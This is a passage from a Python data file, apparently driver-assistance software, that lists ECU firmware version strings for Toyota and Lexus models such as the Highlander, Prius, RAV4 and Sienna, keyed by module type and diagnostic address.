b'F152612800\x00\x00\x00\x00\x00\x00',
b'F152612820\x00\x00\x00\x00\x00\x00',
b'F152612840\x00\x00\x00\x00\x00\x00',
b'F152612890\x00\x00\x00\x00\x00\x00',
b'F152612A00\x00\x00\x00\x00\x00\x00',
b'F152612A10\x00\x00\x00\x00\x00\x00',
b'F152642540\x00\x00\x00\x00\x00\x00',
b'F152676293\x00\x00\x00\x00\x00\x00',
b'F152676303\x00\x00\x00\x00\x00\x00',
b'F152676304\x00\x00\x00\x00\x00\x00',
b'F152612D00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F12010D0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201100\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201300\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F1201400\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b'\x028646F1202000\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F1202100\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F1202200\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b"\x028646F1601300\x00\x00\x00\x008646G2601400\x00\x00\x00\x00",
b'\x028646F4203400\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F76020C0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F7603100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F7603200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
CAR.HIGHLANDER: {
(Ecu.engine, 0x700, None): [
b'\x01896630E09000\x00\x00\x00\x00',
b'\x01896630E43000\x00\x00\x00\x00',
b'\x01896630E43100\x00\x00\x00\x00',
b'\x01896630E43200\x00\x00\x00\x00',
b'\x01896630E44200\x00\x00\x00\x00',
b'\x01896630E45000\x00\x00\x00\x00',
b'\x01896630E45100\x00\x00\x00\x00',
b'\x01896630E45200\x00\x00\x00\x00',
b'\x01896630E46000\x00\x00\x00\x00',
b'\x01896630E46200\x00\x00\x00\x00',
b'\x01896630E74000\x00\x00\x00\x00',
b'\x01896630E75000\x00\x00\x00\x00',
b'\x01896630E76000\x00\x00\x00\x00',
b'\x01896630E77000\x00\x00\x00\x00',
b'\x01896630E83000\x00\x00\x00\x00',
b'\x01896630E84000\x00\x00\x00\x00',
b'\x01896630E85000\x00\x00\x00\x00',
b'\x01896630E86000\x00\x00\x00\x00',
b'\x01896630E88000\x00\x00\x00\x00',
b'\x01896630EA0000\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B48140\x00\x00\x00\x00\x00\x00',
b'8965B48150\x00\x00\x00\x00\x00\x00',
b'8965B48210\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [b'F15260E011\x00\x00\x00\x00\x00\x00'],
(Ecu.dsu, 0x791, None): [
b'881510E01100\x00\x00\x00\x00',
b'881510E01200\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0E01200\x00\x00\x00\x00',
b'8646F0E01300\x00\x00\x00\x00',
],
},
CAR.HIGHLANDERH: {
(Ecu.eps, 0x7a1, None): [
b'8965B48160\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152648541\x00\x00\x00\x00\x00\x00',
b'F152648542\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0230E40000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230E40100\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230EA2000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230EA2100\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0E01200\x00\x00\x00\x00',
b'8646F0E01300\x00\x00\x00\x00',
],
},
CAR.HIGHLANDER_TSS2: {
(Ecu.eps, 0x7a1, None): [
b'8965B48241\x00\x00\x00\x00\x00\x00',
b'8965B48310\x00\x00\x00\x00\x00\x00',
b'8965B48320\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F15260E051\x00\x00\x00\x00\x00\x00',
b'\x01F15260E061\x00\x00\x00\x00\x00\x00',
b'\x01F15260E110\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x01896630E62100\x00\x00\x00\x00',
b'\x01896630E62200\x00\x00\x00\x00',
b'\x01896630E64100\x00\x00\x00\x00',
b'\x01896630E64200\x00\x00\x00\x00',
b'\x01896630EB1000\x00\x00\x00\x00',
b'\x01896630EB1100\x00\x00\x00\x00',
b'\x01896630EB1200\x00\x00\x00\x00',
b'\x01896630EB2000\x00\x00\x00\x00',
b'\x01896630EB2100\x00\x00\x00\x00',
b'\x01896630EB2200\x00\x00\x00\x00',
b'\x01896630EC4000\x00\x00\x00\x00',
b'\x01896630ED9000\x00\x00\x00\x00',
b'\x01896630EE1000\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301400\x00\x00\x00\x00',
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F0E02100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4803000\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.HIGHLANDERH_TSS2: {
(Ecu.eps, 0x7a1, None): [
b'8965B48241\x00\x00\x00\x00\x00\x00',
b'8965B48310\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F15264872300\x00\x00\x00\x00',
b'\x01F15264872400\x00\x00\x00\x00',
b'\x01F15264872500\x00\x00\x00\x00',
b'\x01F15264873500\x00\x00\x00\x00',
b'\x01F152648C6300\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x01896630E67000\x00\x00\x00\x00',
b'\x01896630EA1000\x00\x00\x00\x00',
b'\x01896630EE4000\x00\x00\x00\x00',
b'\x01896630EA1000\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896630E66000\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896630EB3000\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896630EB3100\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896630E66100\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301400\x00\x00\x00\x00',
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F0E02100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4803000\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.LEXUS_IS: {
(Ecu.engine, 0x700, None): [
b'\x018966353M7000\x00\x00\x00\x00',
b'\x018966353M7100\x00\x00\x00\x00',
b'\x018966353Q2000\x00\x00\x00\x00',
b'\x018966353Q2300\x00\x00\x00\x00',
b'\x018966353Q4000\x00\x00\x00\x00',
b'\x018966353R1100\x00\x00\x00\x00',
b'\x018966353R7100\x00\x00\x00\x00',
b'\x018966353R8100\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0232480000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02353P7000\x00\x00\x00\x00\x00\x00\x00\x00530J5000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02353P9000\x00\x00\x00\x00\x00\x00\x00\x00553C1000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152653300\x00\x00\x00\x00\x00\x00',
b'F152653301\x00\x00\x00\x00\x00\x00',
b'F152653310\x00\x00\x00\x00\x00\x00',
b'F152653330\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881515306200\x00\x00\x00\x00',
b'881515306400\x00\x00\x00\x00',
b'881515306500\x00\x00\x00\x00',
b'881515307400\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B53270\x00\x00\x00\x00\x00\x00',
b'8965B53271\x00\x00\x00\x00\x00\x00',
b'8965B53280\x00\x00\x00\x00\x00\x00',
b'8965B53281\x00\x00\x00\x00\x00\x00',
b'8965B53311\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F5301101\x00\x00\x00\x00',
b'8646F5301200\x00\x00\x00\x00',
b'8646F5301300\x00\x00\x00\x00',
b'8646F5301400\x00\x00\x00\x00',
],
},
CAR.PRIUS: {
(Ecu.engine, 0x700, None): [
b'\x02896634761000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634761100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634761200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634762000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634763000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634763100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634765000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634765100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634769000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634769100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634769200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634770000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634774000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634774100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634774200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634782000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634784000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347A0000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347A5000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347A8000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347B0000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x03896634759100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634759200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634759200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634759300\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634760000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701002\x00\x00\x00\x00',
b'\x03896634760000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634760000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634760100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634760200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634760200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634760300\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634768000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4703001\x00\x00\x00\x00',
b'\x03896634768000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4703002\x00\x00\x00\x00',
b'\x03896634768100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4703002\x00\x00\x00\x00',
b'\x03896634785000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4705001\x00\x00\x00\x00',
b'\x03896634785000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710001\x00\x00\x00\x00',
b'\x03896634786000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4705001\x00\x00\x00\x00',
b'\x03896634786000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710001\x00\x00\x00\x00',
b'\x03896634789000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4703002\x00\x00\x00\x00',
b'\x038966347A3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x038966347A3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4707001\x00\x00\x00\x00',
b'\x038966347B6000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710001\x00\x00\x00\x00',
b'\x038966347B7000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710001\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B47021\x00\x00\x00\x00\x00\x00',
b'8965B47022\x00\x00\x00\x00\x00\x00',
b'8965B47023\x00\x00\x00\x00\x00\x00',
b'8965B47050\x00\x00\x00\x00\x00\x00',
b'8965B47060\x00\x00\x00\x00\x00\x00', # This is the EPS with good angle sensor
],
(Ecu.esp, 0x7b0, None): [
b'F152647290\x00\x00\x00\x00\x00\x00',
b'F152647300\x00\x00\x00\x00\x00\x00',
b'F152647310\x00\x00\x00\x00\x00\x00',
b'F152647414\x00\x00\x00\x00\x00\x00',
b'F152647415\x00\x00\x00\x00\x00\x00',
b'F152647416\x00\x00\x00\x00\x00\x00',
b'F152647417\x00\x00\x00\x00\x00\x00',
b'F152647470\x00\x00\x00\x00\x00\x00',
b'F152647490\x00\x00\x00\x00\x00\x00',
b'F152647682\x00\x00\x00\x00\x00\x00',
b'F152647683\x00\x00\x00\x00\x00\x00',
b'F152647684\x00\x00\x00\x00\x00\x00',
b'F152647862\x00\x00\x00\x00\x00\x00',
b'F152647863\x00\x00\x00\x00\x00\x00',
b'F152647864\x00\x00\x00\x00\x00\x00',
b'F152647865\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514702300\x00\x00\x00\x00',
b'881514702400\x00\x00\x00\x00',
b'881514703100\x00\x00\x00\x00',
b'881514704100\x00\x00\x00\x00',
b'881514706000\x00\x00\x00\x00',
b'881514706100\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702000\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4701300\x00\x00\x00\x00',
b'8646F4702001\x00\x00\x00\x00',
b'8646F4702100\x00\x00\x00\x00',
b'8646F4702200\x00\x00\x00\x00',
b'8646F4705000\x00\x00\x00\x00',
b'8646F4705200\x00\x00\x00\x00',
],
},
CAR.PRIUS_V: {
(Ecu.esp, 0x7b0, None): [
b'F152647280\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0234781000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514705100\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4703300\x00\x00\x00\x00',
],
},
CAR.RAV4: {
(Ecu.engine, 0x7e0, None): [
b'\x02342Q1000\x00\x00\x00\x00\x00\x00\x00\x0054212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q1100\x00\x00\x00\x00\x00\x00\x00\x0054212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q1200\x00\x00\x00\x00\x00\x00\x00\x0054212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q1300\x00\x00\x00\x00\x00\x00\x00\x0054212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q2000\x00\x00\x00\x00\x00\x00\x00\x0054213000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q2100\x00\x00\x00\x00\x00\x00\x00\x0054213000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q2200\x00\x00\x00\x00\x00\x00\x00\x0054213000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q4000\x00\x00\x00\x00\x00\x00\x00\x0054215000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B42063\x00\x00\x00\x00\x00\x00',
b'8965B42073\x00\x00\x00\x00\x00\x00',
b'8965B42082\x00\x00\x00\x00\x00\x00',
b'8965B42083\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F15260R102\x00\x00\x00\x00\x00\x00',
b'F15260R103\x00\x00\x00\x00\x00\x00',
b'F152642493\x00\x00\x00\x00\x00\x00',
b'F152642492\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514201200\x00\x00\x00\x00',
b'881514201300\x00\x00\x00\x00',
b'881514201400\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702000\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4201100\x00\x00\x00\x00',
b'8646F4201200\x00\x00\x00\x00',
b'8646F4202001\x00\x00\x00\x00',
b'8646F4202100\x00\x00\x00\x00',
b'8646F4204000\x00\x00\x00\x00',
],
},
CAR.RAV4H: {
(Ecu.engine, 0x7e0, None): [
b'\x02342N9000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342N9100\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342P0000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B42102\x00\x00\x00\x00\x00\x00',
b'8965B42103\x00\x00\x00\x00\x00\x00',
b'8965B42112\x00\x00\x00\x00\x00\x00',
b'8965B42162\x00\x00\x00\x00\x00\x00',
b'8965B42163\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152642090\x00\x00\x00\x00\x00\x00',
b'F152642110\x00\x00\x00\x00\x00\x00',
b'F152642120\x00\x00\x00\x00\x00\x00',
b'F152642400\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514202200\x00\x00\x00\x00',
b'881514202300\x00\x00\x00\x00',
b'881514202400\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702000\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4201100\x00\x00\x00\x00',
b'8646F4201200\x00\x00\x00\x00',
b'8646F4202001\x00\x00\x00\x00',
b'8646F4202100\x00\x00\x00\x00',
b'8646F4204000\x00\x00\x00\x00',
],
},
CAR.RAV4_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896630R58000\x00\x00\x00\x00',
b'\x01896630R58100\x00\x00\x00\x00',
b'\x018966342E2000\x00\x00\x00\x00',
b'\x018966342M8000\x00\x00\x00\x00',
b'\x018966342S9000\x00\x00\x00\x00',
b'\x018966342T1000\x00\x00\x00\x00',
b'\x018966342T6000\x00\x00\x00\x00',
b'\x018966342T9000\x00\x00\x00\x00',
b'\x018966342U4000\x00\x00\x00\x00',
b'\x018966342U4100\x00\x00\x00\x00',
b'\x018966342U5100\x00\x00\x00\x00',
b'\x018966342V0000\x00\x00\x00\x00',
b'\x018966342V3000\x00\x00\x00\x00',
b'\x018966342V3100\x00\x00\x00\x00',
b'\x018966342V3200\x00\x00\x00\x00',
b'\x01896634A05000\x00\x00\x00\x00',
b'\x01896634A19000\x00\x00\x00\x00',
b'\x01896634A19100\x00\x00\x00\x00',
b'\x01896634A20000\x00\x00\x00\x00',
b'\x01896634A20100\x00\x00\x00\x00',
b'\x01896634A22000\x00\x00\x00\x00',
b'\x01896634A22100\x00\x00\x00\x00',
b'\x01896634A30000\x00\x00\x00\x00',
b'\x01896634A44000\x00\x00\x00\x00',
b'\x01896634A45000\x00\x00\x00\x00',
b'\x01896634A46000\x00\x00\x00\x00',
b'\x028966342M7000\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x028966342T0000\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x028966342V1000\x00\x00\x00\x00897CF1202001\x00\x00\x00\x00',
b'\x028966342Y8000\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x02896634A18000\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x02896634A18100\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x02896634A43000\x00\x00\x00\x00897CF4201001\x00\x00\x00\x00',
b'\x02896634A47000\x00\x00\x00\x00897CF4201001\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F15260R210\x00\x00\x00\x00\x00\x00',
b'\x01F15260R220\x00\x00\x00\x00\x00\x00',
b'\x01F15260R290\x00\x00\x00\x00\x00\x00',
b'\x01F15260R300\x00\x00\x00\x00\x00\x00',
b'\x01F152642551\x00\x00\x00\x00\x00\x00',
b'\x01F152642561\x00\x00\x00\x00\x00\x00',
b'\x01F152642700\x00\x00\x00\x00\x00\x00',
b'\x01F152642701\x00\x00\x00\x00\x00\x00',
b'\x01F152642710\x00\x00\x00\x00\x00\x00',
b'\x01F152642711\x00\x00\x00\x00\x00\x00',
b'\x01F152642750\x00\x00\x00\x00\x00\x00',
b'\x01F152642751\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B42170\x00\x00\x00\x00\x00\x00',
b'8965B42171\x00\x00\x00\x00\x00\x00',
b'8965B42180\x00\x00\x00\x00\x00\x00',
b'8965B42181\x00\x00\x00\x00\x00\x00',
b'\x028965B0R01200\x00\x00\x00\x008965B0R02200\x00\x00\x00\x00',
b'\x028965B0R01300\x00\x00\x00\x008965B0R02300\x00\x00\x00\x00',
b'\x028965B0R01400\x00\x00\x00\x008965B0R02400\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4203200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F4203300\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F4203400\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4203500\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4203700\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4203800\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
],
},
CAR.RAV4H_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896634A15000\x00\x00\x00\x00',
b'\x018966342M5000\x00\x00\x00\x00',
b'\x018966342W8000\x00\x00\x00\x00',
b'\x018966342X5000\x00\x00\x00\x00',
b'\x018966342X6000\x00\x00\x00\x00',
b'\x01896634A25000\x00\x00\x00\x00',
b'\x018966342W5000\x00\x00\x00\x00',
b'\x028966342W4001\x00\x00\x00\x00897CF1203001\x00\x00\x00\x00',
b'\x02896634A13000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02896634A13001\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896634A13101\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896634A14001\x00\x00\x00\x00897CF1203001\x00\x00\x00\x00',
b'\x02896634A23000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02896634A23001\x00\x00\x00\x00897CF1203001\x00\x00\x00\x00',
b'\x02896634A14001\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896634A14101\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152642291\x00\x00\x00\x00\x00\x00',
b'F152642290\x00\x00\x00\x00\x00\x00',
b'F152642322\x00\x00\x00\x00\x00\x00',
b'F152642330\x00\x00\x00\x00\x00\x00',
b'F152642331\x00\x00\x00\x00\x00\x00',
b'F152642531\x00\x00\x00\x00\x00\x00',
b'F152642532\x00\x00\x00\x00\x00\x00',
b'F152642520\x00\x00\x00\x00\x00\x00',
b'F152642521\x00\x00\x00\x00\x00\x00',
b'F152642540\x00\x00\x00\x00\x00\x00',
b'F152642541\x00\x00\x00\x00\x00\x00',
b'F152642542\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B42170\x00\x00\x00\x00\x00\x00',
b'8965B42171\x00\x00\x00\x00\x00\x00',
b'8965B42180\x00\x00\x00\x00\x00\x00',
b'8965B42181\x00\x00\x00\x00\x00\x00',
b'\x028965B0R01200\x00\x00\x00\x008965B0R02200\x00\x00\x00\x00',
b'\x028965B0R01300\x00\x00\x00\x008965B0R02300\x00\x00\x00\x00',
b'\x028965B0R01400\x00\x00\x00\x008965B0R02400\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4203200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F4203300\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F4203400\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4203500\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4203700\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4203800\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
],
},
CAR.SIENNA: {
(Ecu.engine, 0x700, None): [
b'\x01896630832100\x00\x00\x00\x00',
b'\x01896630832200\x00\x00\x00\x00',
b'\x01896630838000\x00\x00\x00\x00',
b'\x01896630838100\x00\x00\x00\x00',
b'\x01896630842000\x00\x00\x00\x00',
b'\x01896630843000\x00\x00\x00\x00',
b'\x01896630851000\x00\x00\x00\x00',
b'\x01896630851100\x00\x00\x00\x00',
b'\x01896630851200\x00\x00\x00\x00',
b'\x01896630852000\x00\x00\x00\x00',
b'\x01896630852100\x00\x00\x00\x00',
b'\x01896630859000\x00\x00\x00\x00',
b'\x01896630860000\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B45070\x00\x00\x00\x00\x00\x00',
b'8965B45080\x00\x00\x00\x00\x00\x00',
b'8965B45082\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152608130\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510801100\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702200\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0801100\x00\x00\x00\x00',
],
},
CAR.LEXUS_CTH: {
(Ecu.dsu, 0x791, None): [
b'881517601100\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152676144\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0237635000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F7601100\x00\x00\x00\x00',
],
},
CAR.LEXUS_ES_TSS2: {
(Ecu.engine, 0x700, None): [
